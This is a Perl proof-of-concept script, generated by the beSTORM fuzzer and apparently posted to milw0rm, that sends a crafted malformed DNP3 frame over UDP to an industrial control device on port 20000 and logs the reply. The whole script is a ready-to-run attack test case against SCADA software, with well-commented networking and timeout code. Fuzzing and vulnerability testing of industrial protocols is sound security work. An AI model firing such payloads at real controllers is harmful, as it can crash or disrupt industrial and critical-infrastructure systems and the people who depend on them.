#!/usr/bin/perl
# Automatically generated by beSTORM(tm)
# Copyright Beyond Security (c) 2003-2007 ($Revision: 3741 $)
# Attack vector:
# M0:P0:B0.BT0:B0.BT0:B0.BT0:B0.BT0
# Module:
# DNP3
use strict;
use warnings;
use Getopt::Std;
use IO::Socket::INET;
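# Main script: open a datagram socket to the target, run the configured
# Send/Receive command list against it, and print what was sent and what
# came back.  Defaults below can be overridden from the command line
# (see usage()).

$SIG{INT} = \&abort;

my $host = '192.168.4.52';
my $port = 20000;
my $proto = 'udp';
my $sockType = SOCK_DGRAM;
my $timeout = 1;    # receive timeout in whole seconds; handed to alarm() by receive()

#Read command line arguments
my %opt;
my $opt_string = 'hH:P:t:';
# getopts() returns false on an unknown switch; show the help text instead of
# silently running with the defaults.
getopts( $opt_string, \%opt ) or usage();

if (defined $opt{h}) {
    usage();
}

# A false value (missing switch, "0", "") keeps the default, as before.
$host = $opt{H} ? $opt{H} : $host;
$port = $opt{P} ? $opt{P} : $port;
$timeout = $opt{t} ? $opt{t} : $timeout;

# receive() passes $timeout to alarm(), which only understands whole seconds:
# a non-numeric or fractional value would end up as alarm(0), i.e. no timer at
# all, and the read would block forever.  Reject such values up front.
die "timeout must be a positive integer number of seconds, got '$timeout'\n"
    unless $timeout =~ /\A\d+\z/ && $timeout > 0;

# Command list: each entry is either a Send with an opaque byte string that is
# written to the socket verbatim, or a Receive that collects whatever arrives
# before the timeout.  The payload bytes are the generated test case itself
# and are left untouched.
my @commands = (
    { Command => 'Send',
      Data    => "\x05\x64\x15\xC2\x01\x00\x00\x00\x00\x00\xC3\xC0\x01\x01\x00"
               . "\x01\x07\x08\x01\x02\x03\x04\x05\x06\x07\x08" },
    { Command => 'Receive' },
);

###
# End user configurable part
###

#1. Create a new connection
# Class-method call syntax instead of the indirect-object form `new Class (...)`,
# which is parsed differently if a sub named `new` is ever in scope.
my $sock = IO::Socket::INET->new(
    PeerAddr => $host,
    PeerPort => $port,
    Proto    => $proto,
    Type     => $sockType,
    Timeout  => $timeout,
) or die "socket error: $!\n\n";

# NOTE(review): with Proto 'udp' this only means the local socket was created
# with a peer address set; it does not prove the host is reachable — confirm.
print "connected to: $host:$port\n";

$sock->autoflush(1);
binmode $sock;

#2. communication part
# Payloads and replies are logged as hex (unpack 'H*') rather than as raw
# bytes: the test data contains control characters that would otherwise be
# written straight to the terminal.
foreach my $command (@commands) {
    if ($command->{'Command'} eq 'Receive') {
        my $buf = receive($sock, $timeout);
        if (length $buf) {
            print "received: [" . unpack('H*', $buf) . "]\n";
        }
    }
    elsif ($command->{'Command'} eq 'Send') {
        print "sending: [" . unpack('H*', $command->{'Data'}) . "]\n";
        # send() returns the byte count, which is 0 (false) for an empty
        # datagram; only an undef return is an actual failure.
        defined( send($sock, $command->{'Data'}, 0) )
            or die "send failed, reason: $!\n";
    }
    else {
        warn "unknown command '$command->{'Command'}' skipped\n";
    }
}

#3. Close connection
close($sock) or warn "close failed: $!\n";

#The end
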
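# receive($sock, $timeout)
#
# Read from $sock one byte at a time until nothing more arrives within
# $timeout seconds, or the handle reports EOF / a read error, and return
# everything collected so far as one string ("" if nothing arrived).
#
# $timeout goes straight to alarm(), so it must be a whole number of
# seconds >= 1: alarm(0) disarms the timer and the read could block forever.
#
# Dies with "receive aborted\n" if the eval fails for any reason other than
# our own "timeout\n" signal — for example the SIGINT handler abort() dying
# while a read is in progress.
sub receive {
    my ($sock, $timeout) = @_;

    my $buf = '';

    # Pattern from perldoc -f alarm: arm a timer, do the blocking read inside
    # eval, and let the ALRM handler die out of it.
    while (1) {
        my $byte;
        eval {
            local $SIG{ALRM} = sub { die "timeout\n" };
            alarm $timeout;
            my $ret = read $sock, $byte, 1;    # one byte at a time
            # EOF or read error: reuse the timeout path so the loop ends and
            # whatever was collected is still returned.
            die "timeout\n" if !defined $ret or $ret == 0;
            1;
        };
        my $err = $@;
        # Always disarm the timer.  The EOF/error path above used to die
        # before reaching alarm(0), leaving the timer pending; it would then
        # fire after this handler is gone, with SIGALRM's default action of
        # terminating the process.
        alarm 0;

        if ($err) {
            last if $err eq "timeout\n";
            die "receive aborted\n";
        }
        $buf .= $byte;
    }

    return $buf;
}
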
# SIGINT handler (installed at the top of the script): tell the user, release
# the socket if one was opened, then die so the script stops where it is.
# Uses the file-scoped $sock declared earlier in this file.
sub abort {
    print "aborting...\n";
    close $sock if $sock;
    die "User aborted operation\n";
}

# Print the command-line help, showing the values $host and $port hold at the
# time of the call, then exit with status 0.  Uses the file-scoped $host and
# $port declared earlier in this file.
sub usage {
    print join '',
        "usage: $0 [-hHPt]\n",
        "-h\t: this help message\n",
        "-H\t: override default host - $host\n",
        "-P\t: override default port - $port\n",
        "-t\t: set socket timeout in seconds\n";
    exit 0;
}

# milw0rm.com [2007-08-31]